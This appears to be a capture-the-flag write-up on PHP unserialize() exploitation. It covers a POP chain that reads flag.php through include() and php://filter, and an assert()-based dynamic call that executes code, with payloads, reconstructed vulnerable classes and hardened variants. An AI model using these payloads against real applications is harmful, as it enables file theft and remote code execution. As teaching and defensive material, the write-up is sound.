Deserialization
[MRCTF2020]Ezpop: a simple POP chain
Look at the source.
Deserializing the input triggers __wakeup, where preg_match runs a regex over $this->source. If $source holds the object $show1, preg_match casts it to a string for the match, which triggers its __toString.
__toString runs whenever an object is used as a string.
$show = new Show();
$show1=new Show();
$show->source=$show1;
__get runs when an inaccessible or undefined property is read. __toString reads $this->str->source, so $str is set to a Test object, which has no source property.
$test=new Test();
$show1->str=$test;
__get fires and calls $p as a function; calling an object as a function triggers its __invoke.
$modifier=new Modifier();
$test->p=$modifier;
__invoke calls append(), and append() does an include(), so a php://filter wrapper is used to read flag.php as base64 instead of executing it.
<?php
class Modifier{
    // protected: serialize() writes the name as "\0*\0var", which is the %00%2A%00var in the URL-encoded output
    protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $p;
}
$show = new Show();
$show1=new Show();
$show->source=$show1;     // __wakeup: preg_match on $source casts $show1 to string -> __toString
$test=new Test();
$show1->str=$test;        // __toString reads $str->source; Test has no such property -> __get
$modifier=new Modifier();
$test->p=$modifier;       // __get calls $p() -> Modifier::__invoke -> append -> include
echo urlencode(serialize($show));
Run it:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BN%3B%7D%7D
Pass the result in the URL as the ?pop= parameter:
PD9waHAKY2xhc3MgRmxhZ3sKICAgIHByaXZhdGUgJGZsYWc9ICJmbGFne2Q3Mjg5MjQzLTkzMWEtNGU2OS1iNzIwLWYxYzYzYWVlZjY4NX0iOwp9CmVjaG8gIkhlbHAgTWUgRmluZCBGTEFHISI7Cj8+
Base64-decode it:
<?php
class Flag{
private $flag= "flag{d7289243-931a-4e69-b720-f1c63aeef685}";
}
echo "Help Me Find FLAG!";
?>
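A self-contained harness for the chain above, as an added example that is not the challenge's source: the three classes are reconstructed from the behaviour the writeup describes (their bodies, and the regex in __wakeup, are an assumption and may differ from the real challenge), the gadget chain is built and serialized the same way, and unserialize() is then run twice, once against the raw sink and once with allowed_classes disabled, which is the check to look for when auditing any unserialize() call. flag.php is a constructed file written to the temp directory so the php://filter read has something to return; the wrapper is the writeup's, with an absolute resource path instead of the relative flag.php.

```php
<?php
// Added example: reconstruction of the Ezpop chain described above.
// Class bodies are an assumption modelled on the writeup, not the challenge source.

class Modifier {
    protected $var;
    public function append($value) {
        include($value);                  // sink: include() of attacker-controlled data
    }
    public function __invoke() {
        $this->append($this->var);        // step 4: object called as a function
    }
}

class Show {
    public $source;
    public $str;
    public function __toString() {
        return $this->str->source;        // step 2: $str has no "source" -> __get
    }
    public function __wakeup() {
        // step 1: preg_match needs a string, so a Show in $source is cast -> __toString
        if (preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            $this->source = "index.php";
        }
    }
}

class Test {
    public $p;
    public function __get($key) {
        $function = $this->p;
        return $function();               // step 3: $p is a Modifier -> __invoke
    }
}

// Constructed flag file so the example runs offline.
$flagFile = sys_get_temp_dir() . "/flag_example.php";
file_put_contents($flagFile, "<?php\n\$flag = 'flag{constructed-example}';\n");

function buildChain(string $flagFile): string {
    $modifier = new Modifier();
    // $var is protected: set it through reflection. serialize() then emits the
    // "\0*\0var" name mangling that shows up as %00%2A%00var after urlencode().
    $prop = new ReflectionProperty(Modifier::class, 'var');
    $prop->setAccessible(true);
    $prop->setValue($modifier, "php://filter/read=convert.base64-encode/resource=" . $flagFile);

    $test = new Test();
    $test->p = $modifier;
    $show1 = new Show();
    $show1->str = $test;
    $show = new Show();
    $show->source = $show1;
    return serialize($show);
}

$payload = buildChain($flagFile);
echo urlencode($payload), "\n\n";

// Vulnerable sink: the chain fires inside __wakeup and include() echoes the
// base64 of the flag file. __toString then returns null instead of a string,
// which PHP reports as an Error, but only after the file has already leaked.
try {
    unserialize($payload);
} catch (Throwable $e) {
    echo "\n(chain finished with " . get_class($e) . ": " . $e->getMessage() . ")\n";
}

// Hardened sink: with allowed_classes disabled no Show/Test/Modifier object is
// created, so no magic method runs; the data comes back as __PHP_Incomplete_Class.
$safe = unserialize($payload, ['allowed_classes' => false]);
var_dump($safe instanceof __PHP_Incomplete_Class);   // bool(true)

unlink($flagFile);
```

The allowed_classes option exists since PHP 7.0. It does not make unserialize() safe in general (a list of allowed classes still exposes those classes' magic methods), but for data that should never contain objects, false is the setting to insist on.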
[NPUCTF2020]ReadlezPHP: dynamic function call
Look at the source and serialize the object it builds:
echo serialize($c);
O:8:"HelloPhp":2:{s:1:"a";s:11:"Y-m-d h:i:s";s:1:"b";s:4:"date";}
assert() was meant for catching obvious programmer errors, but when it is given a string it evaluates that string as PHP code (up to PHP 7.4; deprecated in 7.2 and removed in 8.0), so it works as an eval().
The source calls $b($a), so set $b = "assert" and $a = "phpinfo()", which becomes assert("phpinfo()"):
class HelloPhp { public $a; public $b; }   // same public properties as in the serialized output above
$c = new HelloPhp();
$c->a = "phpinfo()";   // the string assert() evaluates
$c->b = "assert";      // the function name that $b($a) calls
echo serialize($c);
Pass it in the URL:
?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
Search the phpinfo() page for the flag.
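The $b($a) sink and the assert() trick, as an added example that is not the challenge's source: HelloPhp is reconstructed on the assumption that the call happens in __destruct and that date() was the intended callee (class and property names come from the serialized payload above); the payload builder shows the s:<length>:"<bytes>" format serialize() produces, and HelloPhpSafe is a hypothetical hardened version with an allowlisted callee.

```php
<?php
// Added example: reconstruction of the ReadlezPHP sink as the writeup
// describes it ($b($a) on deserialized properties). Assumptions: the call
// happens in __destruct and date() was the intended callee.

class HelloPhp {
    public $a;
    public $b;
    public function __destruct() {
        $a = $this->a;
        $b = $this->b;
        echo $b($a), "\n";    // dynamic call: name and argument both come from untrusted data
    }
}

// Hypothetical hardened variant: only the one function the feature needs may run.
class HelloPhpSafe {
    public $a;
    public $b;
    public function __destruct() {
        if ($this->b !== 'date' || !is_string($this->a)) {
            echo "rejected callee: ", var_export($this->b, true), "\n";
            return;
        }
        echo date($this->a), "\n";
    }
}

// Build the payload the way serialize() writes it: s:<byte length>:"<bytes>";
// A wrong length is the usual reason a hand-edited payload fails to unserialize.
function helloPhpPayload(string $a, string $b, string $class = 'HelloPhp'): string {
    return sprintf('O:%d:"%s":2:{s:1:"a";s:%d:"%s";s:1:"b";s:%d:"%s";}',
        strlen($class), $class, strlen($a), $a, strlen($b), $b);
}

// Intended use: date("Y-m-d h:i:s").
$benign = helloPhpPayload("Y-m-d h:i:s", "date");

// Attack: assert() with a string argument evaluates it as PHP on PHP <= 7.4
// with assertions enabled (zend.assertions=1). The writeup uses "phpinfo()";
// a harmless marker is used here.
$malicious = helloPhpPayload('print("attacker code ran\n")', "assert");

echo $benign, "\n", $malicious, "\n";

// The object returned by unserialize() is discarded at once, so __destruct runs here.
unserialize($benign);      // prints the current date
unserialize($malicious);   // PHP <= 7.4: prints the marker, then "1" (assert returned true)
                           // PHP 8: assert() no longer evaluates strings and just returns true,
                           // echoed as "1"; the sink still runs any other callable name as-is

// Same attack against the allowlisted class: the callee is refused.
unserialize(helloPhpPayload('print("attacker code ran\n")', "assert", "HelloPhpSafe"));
```

The PHP 8 change only removes assert() as an eval substitute; $b($a) over deserialized strings remains arbitrary function execution, so the fix is the allowlist (or not deserializing user input into this class at all), not relying on the PHP version.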